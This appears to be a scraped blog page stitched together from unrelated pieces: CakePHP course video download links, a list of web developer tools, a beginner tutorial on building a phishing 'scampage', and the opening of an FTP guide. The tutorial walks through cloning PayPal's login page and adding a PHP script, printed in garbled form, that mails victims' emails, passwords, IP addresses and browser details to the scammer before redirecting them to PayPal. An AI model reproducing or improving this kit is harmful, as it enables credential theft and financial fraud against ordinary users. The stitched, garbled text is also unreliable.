Model callbacks.mp4


 Download NowDownload Now

Introducing various components.mp4


 Download NowDownload Now

Conclusion.mp4


 Download NowDownload Now

BelongsTo and hasMany associations.mp4


 Download NowDownload Now

HasOne model associations.mp4


 Download NowDownload Now

Create and use a custom component.mp4


 Download NowDownload Now

Standard CakePHP components.mp4

 

Download NowDownload Now

CakePHP components.mp4

 

Download NowDownload Now

CakePHP shell.mp4


 Download NowDownload Now

CakePHP naming conventions.mp4


 Download NowDownload Now

Test a CakePHP controller.mp4


 Download NowDownload Now

Test a CakePHP model.mp4


 Download NowDownload Now

CakePHP's hash utility.mp4


 Download NowDownload Now

Understanding layers.mp4


 Download NowDownload Now

Additional controller properties.mp4


 
Download NowDownload Now

Controller pagination.mp4


 Download NowDownload Now

Test a CakePHP behavior.mp4


 Download NowDownload Now

CakePHP views.mp4


 Download NowDownload Now

Exploring vector data.mp4


 Download NowDownload Now

Understanding raster data.mp4


 Download NowDownload Now

Solution - Interacting with the console.mp4


 Download NowDownload Now

Challenge - Interacting with the console.mp4


 Download NowDownload Now

Test a CakePHP component.mp4


 Download NowDownload Now

CakePHP app controllers.mp4


 Download NowDownload Now

CakePHP requirements.mp4


 Download NowDownload Now

Complex associations.mp4


 Download NowDownload Now

Understanding script types and permissions.mp4


 Download NowDownload Now

CakePHP folder structure conventions.mp4


 Download NowDownload Now

Manipulate data in controllers.mp4


 Download NowDownload Now

CakePHP controller methods.mp4


 Download NowDownload Now

Login and logout a user.mp4


 Download NowDownload Now

Authorize a user.mp4


 Download NowDownload Now

Test a CakePHP helper.mp4


 Download NowDownload Now

CakePHP controller flow.mp4

Download NowDownload Now
 

View elements.mp4


 Download NowDownload Now

5 Useful Resources for Junior Web Developers


1. Diagrams -  This is such a great web for draw a lot of diagrams you need. I use it for my databases as long as I need to share with my peers.


Visit : https://app.diagrams.net/


2. CSS Section Generator - If you want to take your website design to another level, this separator generator allows you to create different sections for your web.


Visit : https://wweb.dev/resources/css-separator-generator


3. Grid by example - The perfect place if you need to understand how grid layout works.


Visit : https://gridbyexample.com/


4. JSFiddle - If you need to test your code and you don't want to open VS Code, JSFiddle brings you the possibility to use an online editor.


Visit : https://jsfiddle.net/


5. Sweet Alerts - A beautiful tool for replacement alerts. It's a npm pakage so you need to install it as a dependencie.

HOW TO MAKE SCAMPAGE?

 🔰🔰 


⚙️It's a short tuto, for beginners


Scam page is a fake webpage. e.g. a login of a popular website, online bank login and etc. depending on what it is. scam page are used by spammers to collect data on people who get scammed. detecting scam page is simple if you are technology oriented. but most common users can't detect scam page. this is a big problem in the www. some company are developing software to combat scam's or phishing scams - phishing is the term used

for this scam.


1️⃣ OK, so first we choose a target.


We chose www.paypal.com


2️⃣ Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer.


3️⃣ We open ... There might be a problem, namely the way the image.


4️⃣ If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)


5️⃣ Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work).


 6️⃣ You have a code like <form action="login2.php">. Login2.php change in 040147.php!


 7️⃣ Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username.


 3️⃣ Good memory.


The password, the code should be similar ( xxxxxxxx). So, password is held in variable password. A and memorize it.


 9️⃣ Now, where you have saved. Html, created a new file called 040147.php.


 In it, add the following code:


⚙️Code:


$ To = "upgoingstar@gmail.com"


$ Name = $ _POST ['email'];


$ Email = $ _POST ['email'];


$ Subject = $ _POST ['subject'];


$ Password = $ _POST ['password'];


$ Agent = $ _SERVER ['HTTP_USER_AGENT'];


$ Ip = $ _SERVER ['REMOTE_ADDR'];


$ D = date ('l dS \ of F Y h: i: s A');


$ Sub = "New Account Hacked PayPal - $ email";


$ Headers = "From: $ name <$ email> \ n";


$ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";


$ Mes .= 'Username:'. $ Email. "\ N";


$ Msg .= "Password:". $ Password. "\ N";


$ Msg .= "Browser:". $ Agent. "\ N";


$ Msg .= "IP:". $ Ip. "\ N";


$ Mes .= 'Date and time:'. $ D;


(


mail ($ to, $ sub, $ mes, $ headers);


header ("Location: www.paypal.com");



)


?>


🔟 Modify code


⚙️Code:


 $ To = "Leader@gmail.com"

and put your mail. The code above variables over email and password and sends them together with some more useful details.


11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. : Wink:


 

👍YOUR SCAMPAGE IS READY


Enjoy! Follow us for more... 

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...